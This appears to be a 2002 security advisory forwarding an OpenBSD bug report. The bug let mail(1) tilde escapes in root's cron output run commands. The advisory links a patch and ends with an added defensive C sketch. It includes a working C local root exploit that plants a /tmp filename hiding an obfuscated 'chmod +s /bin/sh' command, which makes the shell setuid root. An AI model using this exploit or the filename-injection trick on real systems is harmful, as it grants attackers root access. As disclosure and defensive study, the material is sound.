There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr 2002). Full problem report and exploit below. FreeBSD is not vulnerable.

----- Forwarded message from urbanek@openbsd.cz -----

From: urbanek@openbsd.cz
To: gnats@openbsd.org
Subject: user/2536: possible root compromise using /usr/bin/mail

>Number:         2536
>Category:       user
>Synopsis:       crontab entry allows possible arbitrary command execution
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    bugs
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon Apr 8 13:30:02 MDT 2002
>Last-Modified:
>Originator:     Milos Urbanek
>Organization:
>Release:        all releases including CURRENT
>Environment:
	System      : OpenBSD 3.0
	Architecture: OpenBSD.i386
	Machine     : i386
>Description:
program /usr/bin/mail allows a special escape sequence to be specified in the body of an email; this escape sequence specifies a shell command to be executed as mentioned in mail(1):

     ~!command
             Execute the indicated shell command, then return to the message.

Problem: default root crontab entry looks like:

# do daily/weekly/monthly maintenance
# on monday only (techie)
30 1 * * 1 /bin/sh /etc/daily 2>&1 | tee /var/log/daily.out | mail -s "`/bin/hostname` daily output" root
30 3 * * 6 /bin/sh /etc/weekly 2>&1 | tee /var/log/weekly.out | mail -s "`/bin/hostname` weekly output" root
30 5 1 * * /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root

If there is something in files /etc/daily, /etc/weekly or /etc/monthly which could enable the attacker to insert their own input, like a malformed filename

chiba:5$ touch \~!haha
chiba:6$ ls -al *haha*
-rw-r--r--  1 milos  milos  0 Apr  8 19:30 ~!haha

or by other means like output from log files under /var/log, the attacker can execute an arbitrary command running under root privileges which can lead to the root compromise.
>How-To-Repeat:
read the man page, and see above
[...]
----- End forwarded message -----

Patch:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

Exploit:

/*
 * (c) 2002 venglin@freebsd.lublin.pl
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to urbanek@openbsd.cz for discovering vulnerability.
 *
 */

#include <fcntl.h>
#include <unistd.h>

int main(void)
{
	int fd;

	chdir("/tmp");
	fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n",
	    O_CREAT|O_WRONLY, 04777);
	if (fd >= 0)
		close(fd);
	return 0;
}

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
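The defence the patch link above points at is, as I read it, to honour tilde escapes only in interactive mode (a terminal on stdin, or -I). As an added example that is neither OpenBSD's collect.c nor the exploit author's code, here is a minimal C model of that decision; escapes_enabled() and collect_body() are my own names, and escape lines are only recorded, never run, so a "~!haha" line arriving through the cron | tee | mail pipe stays message text.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define MAX_ESCAPES 16

/* Escape lines are only recorded, never executed; the point is the decision. */
struct collect_result {
	char body[1024];                 /* text that becomes the message body */
	int  nescapes;                   /* escape lines honoured */
	char escapes[MAX_ESCAPES][128];  /* the escape lines themselves */
};

/* Interactivity as the hardened mail(1) decides it (assumed reading of the
 * fix): stdin is a terminal, or interactive mode was forced with -I. */
int escapes_enabled(FILE *in, int force_interactive)
{
	return force_interactive || isatty(fileno(in));
}

/* Collect lines from `in` into `r`. A leading '~' starts an escape only
 * when `interactive` is set; piped input (cron | tee | mail) keeps it as
 * text. Returns the number of escape lines honoured. */
int collect_body(FILE *in, int interactive, struct collect_result *r)
{
	char line[256];
	r->body[0] = '\0';
	r->nescapes = 0;
	while (fgets(line, sizeof line, in) != NULL) {
		size_t room = sizeof r->body - strlen(r->body) - 1;
		if (interactive && line[0] == '~' && line[1] != '~') {
			if (r->nescapes < MAX_ESCAPES)
				snprintf(r->escapes[r->nescapes], sizeof r->escapes[0], "%s", line);
			r->nescapes++;
			continue;
		}
		/* "~~" in interactive mode means a literal leading tilde */
		strncat(r->body, (interactive && line[0] == '~') ? line + 1 : line, room);
	}
	return r->nescapes;
}

int main(void)
{
	struct collect_result r;
	int n = collect_body(stdin, escapes_enabled(stdin, 0), &r);
	printf("%d escape line(s) honoured; body follows:\n%s", n, r.body);
	return 0;
}
```

Piping the daily output through this model yields zero honoured escapes, whereas typing the same lines at a terminal would still trigger them, which is exactly the distinction the fix relies on.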